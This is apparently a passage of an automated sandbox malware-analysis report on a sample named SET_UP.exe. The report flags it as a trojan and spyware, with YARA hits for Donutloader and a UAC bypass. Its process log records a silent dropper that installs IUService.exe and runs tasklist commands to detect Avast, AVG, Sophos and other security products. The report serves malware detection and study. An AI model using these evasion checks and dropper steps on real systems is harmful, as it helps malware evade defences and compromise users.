                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE6434_2_5000EE64
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE6C34_2_5000EE6C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE7434_2_5000EE74
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE7C34_2_5000EE7C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE8434_2_5000EE84
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE8C34_2_5000EE8C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE9434_2_5000EE94
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE9C34_2_5000EE9C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EEA434_2_5000EEA4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EEAC34_2_5000EEAC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DEAC34_2_5000DEAC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DEB434_2_5000DEB4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EEB434_2_5000EEB4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DEBC34_2_5000DEBC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EEBC34_2_5000EEBC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DEC434_2_5000DEC4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EEC434_2_5000EEC4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DECC34_2_5000DECC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EECC34_2_5000EECC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EED434_2_5000EED4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DED434_2_5000DED4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EEDC34_2_5000EEDC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DEDC34_2_5000DEDC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DEE434_2_5000DEE4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EEE434_2_5000EEE4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DEEC34_2_5000DEEC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EEEC34_2_5000EEEC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EEF434_2_5000EEF4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_50002EFC34_2_50002EFC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EEFC34_2_5000EEFC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF0434_2_5000EF04
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF0C34_2_5000EF0C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF1434_2_5000EF14
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF1C34_2_5000EF1C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF2434_2_5000EF24
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF2C34_2_5000EF2C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF3434_2_5000EF34
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF3C34_2_5000EF3C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF4434_2_5000EF44
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF4C34_2_5000EF4C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF5434_2_5000EF54
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF5C34_2_5000EF5C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF6434_2_5000EF64
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF6C34_2_5000EF6C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF7434_2_5000EF74
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF7C34_2_5000EF7C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF8434_2_5000EF84
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF8C34_2_5000EF8C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF9434_2_5000EF94
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF9C34_2_5000EF9C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFA434_2_5000EFA4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFAC34_2_5000EFAC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFB434_2_5000EFB4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFBC34_2_5000EFBC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFC434_2_5000EFC4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFCC34_2_5000EFCC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFD434_2_5000EFD4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFDC34_2_5000EFDC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFE434_2_5000EFE4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFEC34_2_5000EFEC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFF434_2_5000EFF4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EFFC34_2_5000EFFC
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 02509910 appears 77 times
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 02515890 appears 67 times
                      Source: SET_UP.exeStatic PE information: invalid certificate
                      Source: SET_UP.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: SET_UP.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.4.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.4.drStatic PE information: Number of sections : 11 > 10
                      Source: VER7RSX5CP4YEKECQGJ84KT.exe.0.drStatic PE information: Number of sections : 11 > 10
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.6.drStatic PE information: Number of sections : 11 > 10
                      Source: SET_UP.exe, 00000000.00000003.1981809419.00000000038ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameum_player.exe vs SET_UP.exe
                      Source: SET_UP.exe, 00000000.00000000.1655076323.0000000000578000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs SET_UP.exe
                      Source: SET_UP.exe, 00000000.00000003.1981744706.00000000039D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameum_player.exe vs SET_UP.exe
                      Source: SET_UP.exe, 00000000.00000003.1756311196.0000000002C88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs SET_UP.exe
                      Source: SET_UP.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs SET_UP.exe
                      Source: SET_UP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: 34.2.IUService.exe.931cb29.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 34.2.IUService.exe.9361bf6.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 34.2.IUService.exe.93627f6.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@56/21@3/2
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5001D4C4 GetDiskFreeSpaceW,@System@@_llmul$qqrv,@System@@_llmul$qqrv,34_2_5001D4C4
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02500AD3 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_02500AD3
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000C2EC GetModuleFileNameW,@System@LoadResourceModule$qqrpbo,34_2_5000C2EC
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Roaming\UltraMediaJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_03
                      Source: C:\Users\user\Desktop\SET_UP.exeFile created: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeJump to behavior
                      Source: Yara matchFile source: 34.2.IUService.exe.50000000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2293843395.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\UltraMedia\is-36S8B.tmp, type: DROPPED
                      Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                      Source: SET_UP.exe, 00000000.00000003.1826848306.0000000003538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: SET_UP.exeVirustotal: Detection: 11%
                      Source: SET_UP.exeReversingLabs: Detection: 15%
                      Source: SET_UP.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
                      Source: SET_UP.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
                      Source: SET_UP.exeString found in binary or memory: /LoadInf=
                      Source: SET_UP.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
                      Source: C:\Users\user\Desktop\SET_UP.exeFile read: C:\Users\user\Desktop\SET_UP.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\SET_UP.exe "C:\Users\user\Desktop\SET_UP.exe"
                      Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe "C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe"
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp "C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp" /SL5="$20426,7416882,845824,C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe "C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTART
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeProcess created: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp "C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp" /SL5="$30426,7416882,845824,C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTART
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
                      Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe "C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe"
                      Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe "C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp "C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp" /SL5="$20426,7416882,845824,C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe "C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTARTJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeProcess created: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp "C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp" /SL5="$30426,7416882,845824,C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTARTJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9 Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe "C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
